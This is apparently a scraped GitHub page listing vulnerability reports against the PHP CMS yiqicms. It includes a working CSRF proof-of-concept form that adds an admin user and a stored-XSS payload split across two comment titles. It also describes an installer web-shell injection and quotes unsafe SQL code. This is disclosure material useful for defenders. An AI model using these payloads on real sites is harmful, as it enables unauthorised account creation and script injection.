wacj1425 / yiqicms Goto Github PK

View Code? Open in Web Editor NEW

2.0 2.0 1.0 4.21 MB

yiqicms github file

License: Apache License 2.0

PHP 70.95% HTML 1.12% JavaScript 22.13% CSS 3.61% Smarty 2.19%

yiqicms's People

Contributors

Stargazers

Forkers

fengtalk

yiqicms's Issues

CSRF vulnerability can add user

After the administrator logged in, open the following page
poc：

<html>
  <body>
    <form action="http://172.16.100.15/yiqicms-master/admin/user-add.php" method="POST">
      <input type="hidden" name="username" value="test" />
      <input type="hidden" name="userpass" value="1234" />
      <input type="hidden" name="confirmpass" value="1234" />
      <input type="hidden" name="useremail" value="1234&#64;qq&#46;com" />
      <input type="hidden" name="usergender" value="0" />
      <input type="hidden" name="action" value="save" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

There is some Stroage XSS in vulnerabilities in /admin/(article-add | product-add | link ……).php

I just use admin/article-add.php as the example

and then we enter the link (article.php/name=about

)

now we can see the database

the other pages is just like this, so I don't show again.

There is a CSRF vulnerability in admin/article.php

the cms post the form without random token,so it will cause a cstf vulnerability.
we create a test.html

if the administrator has logined, and then he click the test.html

the article has been deleted

one can insert malicious code in the installation process to get a web shell

In the CMS installation process, the configuration file filtering is not rigorous, you can insert malicious code in the installation process to execute arbitrary commands, and even get Webshell

in the install/install.php

author just check the database's name and its passwd,but not check the $dbprefix,so we can get Webshell.

and then

There is a storage xss vulnerability in comment title

comment.php code show as below. Only length restrictions are applied to the $msgtitle. So caused a loophole. We can use /**/ to bypass the length limit. For example, the first comment title input "<script>alert(11111/", and second input "/11111)</script>". View comments in the background to trigger the vulnerability.

if($action == "save")
{
    $msgtitle = $_POST["msgtitle"];
    $msgname = $_POST["msgname"];
    $msgcontact = $_POST["msgcontact"];
    $msgcontent = htmlspecialchars($_POST["msgcontent"]);
    
    if (empty($_SESSION['captcha']) || trim(strtolower($_POST['capcode'])) != $_SESSION['captcha']) 
    {
        ShowMsg("验证码错误,请重新输入");
        exit();
    }
    
    if(!preg_match("/^.{1,30}$/",$msgtitle))
    {
        ShowMsg("请输入正确的标题");
        exit();
    }
    if(!preg_match("/^.{1,10}$/",$msgname))
    {
        ShowMsg("请输入您的姓名");
        exit();
    }
    if(!preg_match("/^.{1,20}$/",$msgcontact))
    {
        ShowMsg("请输入正确的联系方式");
        exit();
    }
    if(!preg_match("/^.{1,200}$/",$msgcontent))
    {
        ShowMsg("请输入正确的留言内容");
        exit();
    }
        
    $msgcontent = safeCheck($msgcontent);
    
    $userip = $_SERVER["REMOTE_ADDR"];;
	$sql = "INSERT INTO yiqi_comments (cid ,title ,name,contact,content,ip,adddate)" .
		   "VALUES (NULL, '$msgtitle', '$msgname', '$msgcontact','$msgcontent', '$userip', null)";
	$result = $yiqi_db->query(CheckSql($sql));
	if($result == 1)
	{
	    ShowMsg("留言添加成功");
	}
	else
	{
	    ShowMsg("留言添加失败");
	}
}

wacj1425 / yiqicms Goto Github PK

yiqicms's People

Contributors

Stargazers

Forkers

yiqicms's Issues

CSRF vulnerability can add user

There is some Stroage XSS in vulnerabilities in /admin/(article-add | product-add | link ……).php

There is a CSRF vulnerability in admin/article.php

one can insert malicious code in the installation process to get a web shell

There is a storage xss vulnerability in comment title

Recommend Projects

React

Vue.js

Typescript

TensorFlow

Django

Laravel

D3

Recommend Topics

javascript

web

server

Machine learning

Visualization

Game

Recommend Org

Facebook

Microsoft

Google

Alibaba

D3

Tencent